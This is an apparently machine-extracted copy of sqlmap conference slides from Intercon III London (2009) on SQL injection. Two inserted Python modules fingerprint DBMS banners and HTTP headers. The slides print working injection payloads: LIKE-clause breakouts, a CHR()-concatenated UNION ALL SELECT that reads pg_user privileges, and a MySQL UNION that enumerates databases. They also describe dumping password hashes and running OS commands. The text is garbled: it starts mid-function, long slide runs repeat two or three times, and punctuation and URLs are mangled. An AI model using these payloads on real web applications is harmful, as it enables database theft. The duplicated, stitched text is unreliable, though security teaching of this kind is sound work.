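    if t.startswith("win") or "mingw" in t:
        return "Windows"
    if "freebsd" in t:
        return "FreeBSD"
    if "solaris" in t or "sunos" in t:
        return "Solaris"
    if "darwin" in t or "apple" in t:
        return "macOS"
    return name


def parse_banner(banner, version_compile_os=None):
    """Fingerprint DBMS, version and underlying OS from the banner returned
    by version() (PostgreSQL) or @@version (MySQL, SQL Server). MySQL's
    banner carries no OS, so its @@version_compile_os is an optional second
    input. Unknown fields stay None."""
    info = {"dbms": None, "version": None, "build": None, "service_pack": None, "os": None}
    text = " ".join(banner.split())   # collapse the newlines/tabs SQL Server emits

    m = re.match(r"PostgreSQL (\d+(?:\.\d+)+) on ([\w.-]+)", text)
    if m:
        info.update(dbms="PostgreSQL", version=m.group(1), os=os_family(m.group(2)))
        return info

    m = re.match(r"Microsoft SQL Server (\d{4}) - (\d+\.\d+\.\d+)", text)
    if m:
        info.update(dbms="Microsoft SQL Server", version=m.group(1), build=m.group(2))
        if m.group(1) == "2005":
            info["service_pack"] = MSSQL_2005_SP.get(m.group(2))
        w = re.search(r"on Windows NT (\d+\.\d+)(?: \(Build (\d+): Service Pack (\d+)\))?", text)
        if w:
            info["os"] = WINDOWS_NT.get(w.group(1), "Windows NT " + w.group(1))
            if w.group(3):
                info["os"] += " SP" + w.group(3)
        return info

    m = re.match(r"(\d+\.\d+\.\d+[a-z]?)", text)   # MySQL: bare version string
    if m:
        info.update(dbms="MySQL", version=m.group(1),
                    os=os_family(version_compile_os) if version_compile_os else None)
    return info


def describe(info):
    """One-line summary in the form the slide prints."""
    s = "%s %s" % (info["dbms"], info["version"])
    if info["service_pack"] is not None:
        s += " Service Pack %d version %s" % (info["service_pack"], info["build"])
    return s


if __name__ == "__main__":
    for name, banner in SAMPLES.items():
        print(name, parse_banner(banner, "debian-linux-gnu" if name == "mysql" else None))
```

The SQL Server banner is the richest of the three: it names the host OS and its service pack outright, while PostgreSQL only leaks the build triplet and MySQL needs a second variable (@@version_compile_os) to say anything about the OS at all.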
Second demo
"A demo, as in demolish or demonstration?" Cyclops, X-Men Evolution
Intercon III London ndash January 9 2009 18
You have got an injection point
The injection point is in a SQL statement as follows
SELECT FROM users WHERE id LIKE ((( $_GET[id] ))) LIMIT 0 1
SQL payload (13)
Intercon III London ndash January 9 2009 19
Obstacle
The injection is after a LIKE clause within three parenthesis the statement terminates with a LIMIT clause
SQL payload (23)
Intercon III London ndash January 9 2009 20
In this example the SQL payload that sqlmap identifies is
id=1))) AND (((RaNd LIKE RaNd
In the inferential blind SQL injection algorithm will be
id=1))) AND ORD(MID((SQL query) Nth SQL query output character 1)) gt Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique will be
id=1))) UNION ALL SELECT NULL Concatenated SQL query NULL AND (((RaNd LIKE RaNd
SQL payload (33)
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
More on fingerprint
Fingerprinting is a key step in penetration testing.
It is not only about back-end DBMS software.
There are techniques and tools to fingerprint the web server, the web application technology and their underlying system.
What about the back-end DBMS underlying system?
sqlmap can fingerprint them without making extra requests:
Web application server and web application technology, by parsing the HTTP response headers (Server, X-AspNet-Version, X-Powered-By, etc.): known technique
Back-end DBMS operating system, by parsing the DBMS banner: over-looked technique
Intercon III London – January 9 2009 34
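The banner and header parsing the slide describes, as an added example that is not sqlmap's own code (the slides do not reproduce it): a Python module that takes the string a DBMS returns for VERSION(), version() or @@version, and the HTTP response headers of a web application, and extracts DBMS software, version, service pack, operating system, distribution and architecture from them. The banners and header sets below are constructed samples in the format the respective products emit; the build-number-to-service-pack table covers SQL Server 2005 only, and the Windows NT version map is the usual kernel-to-product mapping. A defender can run the same parsers over their own banners to see what they disclose to a tool that needs no extra requests to learn it.

```python
import re
from dataclasses import dataclass
from typing import Optional


@dataclass
class Fingerprint:
    dbms: Optional[str] = None
    dbms_version: Optional[str] = None
    dbms_sp: Optional[str] = None      # DBMS service pack, where the build number reveals it
    os: Optional[str] = None
    os_detail: Optional[str] = None    # Linux distribution or Windows service pack
    arch: Optional[str] = None


# Windows NT kernel versions as they appear in the SQL Server @@version banner.
WINDOWS_NT = {"5.0": "Windows 2000", "5.1": "Windows XP",
              "5.2": "Windows Server 2003", "6.0": "Windows Vista / Server 2008"}
# SQL Server 2005 build numbers of the RTM (Service Pack 0) and service pack releases.
MSSQL_2005_SP = {"1399": "Service Pack 0", "2047": "Service Pack 1", "3042": "Service Pack 2",
                 "4035": "Service Pack 3", "5000": "Service Pack 4"}
LINUX_DISTROS = ("Debian", "Ubuntu", "Red Hat", "SUSE", "Fedora", "CentOS", "Gentoo")

# Constructed sample banners (not taken from any real host) in each product's format.
SAMPLE_BANNERS = (
    "PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2",
    "PostgreSQL 8.3.5, compiled by Visual C++ build 1400",
    "5.0.51a-3ubuntu5.4",
    "5.0.45-community-nt",
    "Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) \n\tOct 14 2005 00:33:37 \n\t"
    "Copyright (c) 1988-2005 Microsoft Corporation\n\t"
    "Express Edition on Windows NT 5.2 (Build 3790: Service Pack 1)",
)


def fingerprint_dbms_banner(banner: str) -> Fingerprint:
    """Infer DBMS, version and underlying OS from a VERSION()/version()/@@version string."""
    fp = Fingerprint()
    b = " ".join(banner.split())  # @@version spans several tab-indented lines

    # PostgreSQL: "PostgreSQL <ver> on <cpu-vendor-os>, compiled by <compiler string>"
    m = re.match(r"PostgreSQL (?P<ver>[\d.]+)(?: on (?P<triplet>\S+?))?, compiled by (?P<cc>.*)", b)
    if m:
        fp.dbms, fp.dbms_version = "PostgreSQL", m.group("ver")
        triplet = m.group("triplet") or ""
        parts = triplet.split("-")
        if len(parts) >= 3:                      # cpu-vendor-os[-abi] target triplet
            fp.arch = parts[0]
            fp.os = "Linux" if "linux" in triplet else parts[2].capitalize()
        if "Visual C++" in m.group("cc") or "mingw" in triplet:
            fp.os = "Windows"
        for distro in LINUX_DISTROS:             # packagers stamp the compiler string
            if distro in m.group("cc"):
                fp.os_detail = distro
        return fp

    # Microsoft SQL Server: "Microsoft SQL Server <year> - <build> (<arch>) ... on Windows NT <nt> (Build n: <sp>)"
    m = re.match(r"Microsoft SQL Server (?P<year>\d{4})\s*-\s*(?P<ver>[\d.]+)", b)
    if m:
        fp.dbms = "Microsoft SQL Server " + m.group("year")
        fp.dbms_version = m.group("ver")
        build = fp.dbms_version.split(".")
        if m.group("year") == "2005" and len(build) >= 3:
            fp.dbms_sp = MSSQL_2005_SP.get(build[2])
        a = re.search(r"\((Intel X86|X64|IA64)\)", b)
        if a:
            fp.arch = a.group(1)
        w = re.search(r"on Windows NT (?P<nt>\d+\.\d+) \(Build \d+: (?P<sp>[^)]+)\)", b)
        if w:
            fp.os = WINDOWS_NT.get(w.group("nt"), "Windows NT " + w.group("nt"))
            fp.os_detail = w.group("sp")
        else:
            fp.os = "Windows"
        return fp

    # MySQL: VERSION() is "5.0.51a-3ubuntu5.4", "5.0.45-community-nt", "5.1.30-log", ...
    m = re.match(r"(?P<ver>\d+\.\d+\.\d+[a-z]?)(?P<suffix>\S*)", b)
    if m:
        fp.dbms, fp.dbms_version = "MySQL", m.group("ver")
        suffix = m.group("suffix").lower()
        if re.search(r"-nt\b|win(32|64)", suffix):  # "-nt" builds are the Windows packages
            fp.os = "Windows"
        elif "ubuntu" in suffix:
            fp.os, fp.os_detail = "Linux", "Ubuntu"
        elif "debian" in suffix:
            fp.os, fp.os_detail = "Linux", "Debian"
        elif re.search(r"\.el\d", suffix):
            fp.os, fp.os_detail = "Linux", "Red Hat / CentOS"
    return fp


def fingerprint_http_headers(headers: dict) -> dict:
    """Read what the web server and application technology announce about themselves."""
    h = {k.lower(): v for k, v in headers.items()}
    out = {}
    server = h.get("server", "")
    m = re.match(r"(?P<name>[\w-]+)/(?P<ver>[\d.]+)", server)
    if m:
        out["web_server"], out["web_server_version"] = m.group("name"), m.group("ver")
    m = re.search(r"\(([^)]+)\)", server)        # Apache's "(Debian)", "(Win32)", "(Unix)"
    if m:
        out["os"] = m.group(1)
    elif server.lower().startswith("microsoft-iis"):
        out["os"] = "Windows"
    php = re.search(r"PHP/(\S+)", server + " " + h.get("x-powered-by", ""))
    if "x-aspnet-version" in h:
        out["technology"] = "ASP.NET " + h["x-aspnet-version"]
    elif php:
        out["technology"] = "PHP " + php.group(1)
    elif "x-powered-by" in h:
        out["technology"] = h["x-powered-by"]
    return out


if __name__ == "__main__":
    for banner in SAMPLE_BANNERS:
        print(fingerprint_dbms_banner(banner))
    print(fingerprint_http_headers({"Server": "Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny3"}))
    print(fingerprint_http_headers({"Server": "Microsoft-IIS/6.0", "X-Powered-By": "ASP.NET",
                                    "X-AspNet-Version": "2.0.50727"}))
```

The parsers only read strings the server volunteers; if the output worries you, the fix is on the server side (suppress the Server and X-Powered-By details, keep verbose error pages off, and keep the DBMS patched so that the service pack the build number reveals is not an old one).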
Second demo
"A demo, as in demolish or demonstration?" Cyclops, X-Men Evolution
Intercon III London – January 9 2009 35
Give me a SQL shell
It might come in handy sometimes to be able to run your own SQL queries, mainly for file system read and write access and operating system command execution.
The tool inspects the provided statement:
If it is a SELECT statement, sqlmap uses, depending on the user's options, the inferential blind or the UNION query technique to retrieve its output.
If it is a data manipulation statement, a transaction statement or any other valid SQL statement, it uses stacked queries to run it, if the web application supports them.
Intercon III London – January 9 2009 36
Automation vs granularity (1/2)
sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications.
Providing it with a source of targets, it can automatically:
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS-specific queries and then manually inject them to enumerate users' password hashes, check if the session user is a DBA, enumerate table columns' data types, etc.
There is an option to dump the whole back-end DBMS.
Intercon III London – January 9 2009 37
Automation vs granularity (2/2)
The tester is a professional: he knows what he does and why.
There are options to specify:
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from the command line and/or a configuration file.
Options are documented in the user's manual, with examples.
Intercon III London – January 9 2009 38
Third demo
"I get tons of uninteresting mail, and system announcements about babies born, etc. At least a demo MIGHT have been interesting." Richard Stallman
Intercon III London – January 9 2009 39
Limitations
Can sqlmap fail to detect or to exploit a SQL injection vulnerability?
Yes, in some cases, mainly because it does not support:
SQL injection on SQL clauses other than WHERE
Time-based blind SQL injection technique
but I am working on these and others.
Intercon III London – January 9 2009 40
Want to contribute?
I am always looking forward to code contributions.
Try it, find bugs, send feature requests, review the code and the documentation, contribute on the mailing lists.
I can provide you with:
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in the London area
Intercon III London – January 9 2009 41
Links and contacts
Homepage: http://sqlmap.sourceforge.net
Documentation:
http://sqlmap.sourceforge.net/dev/index.html
http://sqlmap.sourceforge.net/doc/README.pdf
Mailing lists:
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
https://lists.sourceforge.net/lists/listinfo/sqlmap-devel
Personal contacts:
E-mail / Jabber: bernardo.damele@gmail.com
Blog: http://bernardodamele.blogspot.com
Intercon III London – January 9 2009 42
References
OWASP Testing Guide, Open Web Application Security Project
Exploit of a Mom, xkcd
Deep Blind SQL Injection, Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability, Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework, H D Moore and the Metasploit development team
w3af, Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference, David Litchfield (NGS Software)
Advanced SQL Injection, Victor Chapela (Sm4rt Security Services)
Python difflib, Python Software Foundation
NULL (SQL), Wikipedia
Agent oriented SQL abuse, Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection, Bernardo Damele A G
DBMS Fingerprint, Daniele Bellucci (OWASP Backend Security Project)
Intercon III London – January 9 2009 43
Questions?
Thanks for your attention
Intercon III London ndash January 9 2009 19
Obstacle
The injection is after a LIKE clause within three parenthesis the statement terminates with a LIMIT clause
SQL payload (23)
Intercon III London ndash January 9 2009 20
In this example the SQL payload that sqlmap identifies is
id=1))) AND (((RaNd LIKE RaNd
In the inferential blind SQL injection algorithm will be
id=1))) AND ORD(MID((SQL query) Nth SQL query output character 1)) gt Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique will be
id=1))) UNION ALL SELECT NULL Concatenated SQL query NULL AND (((RaNd LIKE RaNd
SQL payload (33)
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 20
In this example the SQL payload that sqlmap identifies is
id=1))) AND (((RaNd LIKE RaNd
In the inferential blind SQL injection algorithm will be
id=1))) AND ORD(MID((SQL query) Nth SQL query output character 1)) gt Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique will be
id=1))) UNION ALL SELECT NULL Concatenated SQL query NULL AND (((RaNd LIKE RaNd
SQL payload (33)
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
